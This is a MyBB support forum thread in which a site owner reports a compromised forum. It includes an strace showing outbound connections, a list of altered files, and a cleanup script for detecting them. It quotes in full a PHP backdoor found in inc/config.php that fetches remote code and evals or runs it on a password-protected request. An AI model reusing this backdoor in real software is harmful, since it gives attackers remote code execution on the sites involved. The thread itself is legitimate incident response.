MyBB Community Forums

Full Version: Possible malware on my forum?
Yesterday I posted about loading problems with "go to latest post". My host checked the website again after a few internal server errors, and they performed a strace. They found a script connecting to the IP address 91.196.216.30. I looked up the IP address on Google and it seems to be some kind of malware which tries to add links to the bottom of your website.

This is what my host found:

Quote:I've taken a look at your site and after performing an strace I see the script is trying to make repeated connections to the IP 91.196.216.30; however, this host appears down, I cannot ping it nor connect to port 80. Perhaps there is a typo in this address? I've attached a piece of my strace:
</html>) = 40
gettimeofday({1320279734, 915811}, NULL) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 6
fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
connect(6, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("91.196.216.30")}, 16) = -1 EINPROGRESS (Operation now in progress)
poll([{fd=6, events=POLLIN|POLLOUT|POLLERR|POLLHUP}], 1, 60000) = 0 (Timeout)
fcntl64(6, F_SETFL, O_RDWR) = 0
gettimeofday({1320279794, 954178}, NULL) = 0

I searched on google for the IP: http://www.google.nl/search?q=91.196.216...=firefox-a

It seems like something which happens on WordPress sites, and I read that "What this code does is very simple. It connects to http://91.196.216.30/bot.php to get a few links to be added to the bottom of your site."

Can someone please help me in checking if this is indeed the case and what steps I should take?

I run version 1.6.4 with the manual security patch from the blog.

First run the file verification tool in the Tools & Maintenance section AND check for changed files ...
On the Tools & Maintenance page it suddenly says that ./inc/config.php is not CHMOD to writable (it always has been). Maybe this is because I'm currently redirecting the file /forum/index.php to /offline/index.html? That is a page saying that the forum is temporarily offline.

According to the file verification, the following files are changed (and a bunch of images, but that's correct because I use custom button images etc.). I don't believe I changed any of these files (only templates for the header etc.).

Quote:index.php
archive/index.php
*customadmindir*/modules/home/index.php
*customadmindir*/index.php
install/resources/upgrade20.php
install/resources/language.lang.php
install/index.php
showthread.php
Delete /install/

Reupload index.php, showthread.php, archive/index.php, *customadmindir*/modules/home/index.php, and *customadmindir*/index.php from a fresh download.
AND you may also have to check /inc/config.php for any malicious code (though it appears to be not writable).
I assume this is also malicious code; it's in /inc/config.php:

if (isset($_GET['pingnow']) && isset($_GET['pass'])){
    if ($_GET['pass'] == '67c08c98984cc2bc4b9d1f0d2fe6726a'){
        if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}

I removed it. And is it correct that the config file ends with:

);
?>

?
^ Yes, that is malicious code; please compare with [wiki: config.php]
Thanks! I first compared it to the downloaded one, but that was empty, doh. So I just looked myself.
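As an added example (not code from this thread or from MyBB itself), here is a small audit script in the spirit of the file-verification advice above: it hashes every PHP file under a MyBB tree against a manifest built from a fresh download and flags the indicators seen in the config.php backdoor quoted earlier (the pingnow trigger, curl_init on request input, eval of the fetched body). The sample tree, the manifest and the indicator names are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile

# Indicators taken from the backdoor quoted in this thread; the names are mine.
INDICATORS = {
    "remote_eval": re.compile(r"eval\s*\(\s*\$\w+\s*\)"),
    "curl_from_request": re.compile(r"curl_init\s*\(\s*\$_(GET|POST|REQUEST)\b"),
    "pingnow_trigger": re.compile(r"\$_(GET|POST|REQUEST)\s*\[\s*['\"]pingnow['\"]"),
}
def audit_tree(root, clean_hashes):
    """clean_hashes maps relative path -> sha256 of a fresh MyBB download.
    Reports files whose hash differs or is missing from the manifest, plus
    indicator hits (these matter most in site-specific files like inc/config.php)."""
    findings = {"changed": [], "unknown": [], "suspicious": {}}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as f:
                data = f.read()
            if rel not in clean_hashes:
                findings["unknown"].append(rel)
            elif clean_hashes[rel] != hashlib.sha256(data).hexdigest():
                findings["changed"].append(rel)
            src = data.decode("utf-8", errors="replace")
            hits = [n for n, rx in INDICATORS.items() if rx.search(src)]
            if hits:
                findings["suspicious"][rel] = hits
    return findings

# Constructed sample tree: a clean index.php and an inc/config.php carrying a
# compressed form of the thread's backdoor (trigger, curl fetch, eval).
CLEAN_INDEX = "<?php\nrequire_once './global.php';\n"
BACKDOOR = ("if (isset($_GET['pingnow'])&& isset($_GET['pass'])){\n"
            "$ch = curl_init($_GET['file']);\n$re = curl_exec($ch);\neval($re);\n}\n")

def demo():
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "inc"))
    with open(os.path.join(root, "index.php"), "w", newline="\n") as f:
        f.write(CLEAN_INDEX)
    with open(os.path.join(root, "inc", "config.php"), "w", newline="\n") as f:
        f.write("<?php\n$config['database']['type'] = 'mysqli';\n" + BACKDOOR)
    manifest = {"index.php": hashlib.sha256(CLEAN_INDEX.encode()).hexdigest()}
    return audit_tree(root, manifest)
```

Files that are site-specific and therefore never in a clean manifest (config.php, settings.php) can only be caught by the indicator scan, so read those by hand as well, as the thread does.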

There is one thing that looks valid/authentic, but is not in the wiki config page. So I'm not entirely sure if I should remove this also:

/**
 * Memcache configuration
 *  If you are using memcache as your data-cache,
 *  you need to configure the hostname and port
 *  of your memcache server below.
 *
 * If not using memcache, ignore this section.
 */

$config['memcache']['host'] = 'localhost';
$config['memcache']['port'] = 11211;
That's fine. It's just a caching mechanism.
Thanks. +1 rep for both of you for the quick help.

There seems to be one other issue, but I'm trying to figure out if it's MyBB related or server related. I already sent a ticket to the host, but I'll check here anyway; maybe it has something to do with the malicious code.

When I try to load the front page of my website (which uses custom "news code" to query the forum for new threads in specific forums) I get a MySQL error. Sometimes it loads after a long, long wait. The forum itself runs like a charm, no errors and very quick since I removed the malicious files.

The error on the front page is this:

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
    2006 - MySQL server has gone away
Query:
    SELECT * FROM mybb_threads WHERE fid='2' OR fid='122' ORDER BY tid DESC LIMIT 12 

The news code that is being used on the front page is this:

<?php

$query = $db->simple_select('threads', '*', "fid='2' OR fid='122' ORDER BY tid DESC LIMIT {$limit}");
if($db->num_rows($query) > 0)
{
    while($row = $db->fetch_array($query))
    {
        $query2 = $db->simple_select('posts', '*', "pid='{$row['firstpost']}'");
        $row2 = $db->fetch_array($query2);

        $date = my_date($mybb->settings['dateformat'], $row2['dateline'], "", 1);
        $time = my_date($mybb->settings['timeformat'], $row2['dateline'], "", 1);

        $options = array(
            'allow_html' => '1',
            'filter_badwords' => '1',
            'allow_mycode' => '1',
            'allow_smilies' => '1',
            'nl2br' => '1',
            'me_username' => '1'
        );
        $message = $parser->parse_message($row2['message'], $options);
        echo("<table border=\"0\" width=\"650px\" valign=\"top\"><tr><td style=\"padding: 6px;\" background=\"images/bg_menurechts.png\" background-repeat: repeat-y background-repeat: repeat-x><span class=\"nieuwstitel\"><a href=\"{$forumpath}showthread.php?tid={$row['tid']}\">{$row['subject']}</a></span><br>
        <span class=\"standaardkleiner\">Door <a href=\"{$forumpath}member.php?action=profile&uid={$row2['uid']}\">{$row2['username']}</a> op {$date} om {$time}</span></td></tr></table>");
        echo("<br>");
        echo("<table border=\"0\" width=\"650px\" valign=\"top\"><tr><td style=\"padding: 6px;\"><span class=\"standaardkleiner\">{$message}<br><br>");
        echo("<a href=\"{$forumpath}showthread.php?tid={$row['tid']}\">{$row['replies']} Reacties</a></span><br><br><br></td></tr></table>");
    }
}
else
{
    echo 'Nothing to display.';
}
?>